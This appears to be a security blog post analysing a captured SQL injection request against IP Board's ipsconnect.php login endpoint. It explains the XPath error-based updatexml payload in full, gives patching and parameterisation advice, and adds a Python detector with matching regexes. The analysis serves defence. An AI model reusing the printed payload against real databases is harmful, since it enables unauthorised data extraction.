POST /interface/ipsconnect/ipsconnect.php HTTP/1.1
Host: mywebsite.com
Connection: keep-alive
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: utf-8;q=0.7,*;q=0.3
Accept-Encoding: gzip,deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36
act=login
idType=id
id[]=-1
id[]=-1) and 1!="'" and updatexml(NULL,concat(0x3a, ( select table_name from information_schema.tables where BINARY LEFT(table_name, 1) = 'nnn' LIMIT 0,1 ) ),NULL)-- -'
If you look at the request above, you see it's sending a payload in the id[] parameter, which must not be using parameterized queries and must not be sanitizing the values correctly. The id should clearly be an integer, but in this case the application accepts strings: big, ugly, long strings, strings that contain SQL code!
updatexml() is a MySQL function that essentially does an XML string replace. So why would the attacker start with a NULL string and replace it with a NULL string? This is actually called XPath error-based injection. If the attack succeeds, an error gets thrown, and the error message itself carries the exfiltrated data: the concat() prepends 0x3a (a colon) to the subquery result, which makes the second argument an invalid XPath expression, so MySQL echoes it back in the error text. In this case they are trying to grab the name of a particular SQL table to see if they've gained access to the database. If successful it'll probably display something like
Output: XPATH syntax error: ':tableNameHere'
To prevent this, make sure your IP Board software is updated/patched, have a WAF or IPS that blocks SQL injection attacks, and from a coding perspective use parameterized SQL queries so strings can't be passed where integers are expected, and validate input so special characters like these aren't allowed either.
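As an added example (not code from the original post or from IP Board), here is a small Python checker that flags the pattern above in a request body and pulls the leaked value out of the resulting MySQL error text; the sample bodies are constructed, the first one mirroring the captured request.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed sample request bodies. The first mirrors the captured request;
# the other two are what legitimate logins look like.
SAMPLE_BODIES = [
    "act=login&idType=id&id[]=-1&id[]=-1) and 1!=\"'\" and updatexml(NULL,"
    "concat(0x3a, ( select table_name from information_schema.tables where "
    "BINARY LEFT(table_name, 1) = 'nnn' LIMIT 0,1 ) ),NULL)-- -'",
    "act=login&idType=id&id[]=42",
    "act=login&idType=email&id[]=user%40example.com",
]

# MySQL XML functions used for error-based exfiltration, combined with the
# concat() that smuggles the queried value into the XPath error message.
ERROR_BASED_RE = re.compile(r"\b(updatexml|extractvalue)\s*\(.*\bconcat\s*\(", re.I | re.S)
INT_RE = re.compile(r"^-?\d+$")
# Shape of the MySQL error shown above; the leading ':' is the 0x3a from concat().
XPATH_ERR_RE = re.compile(r"XPATH syntax error: '(.*)'")


def analyze_body(body: str) -> dict:
    """Return the findings for one URL-encoded POST body."""
    params = parse_qs(body, keep_blank_values=True)
    findings = []
    # Decode before matching so %-encoded payloads are not missed.
    if ERROR_BASED_RE.search(unquote_plus(body)):
        findings.append("xpath_error_based_sqli")
    # When the login is by numeric id, every id[] value must be an integer;
    # this is the validation the vulnerable endpoint was missing.
    if params.get("idType", [""])[0] == "id":
        if any(not INT_RE.match(v) for v in params.get("id[]", [])):
            findings.append("non_integer_id")
    return {"findings": findings, "suspicious": bool(findings)}


def extract_leaked_value(error_text: str):
    """Pull the exfiltrated value out of an XPATH syntax error, or None."""
    m = XPATH_ERR_RE.search(error_text)
    return m.group(1).lstrip(":") if m else None


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(analyze_body(body))
    print(extract_leaked_value("XPATH syntax error: ':tableNameHere'"))
```

Running extract_leaked_value over application error logs tells you what an attacker actually retrieved, not just that they tried.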
More about neonprimetime
Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.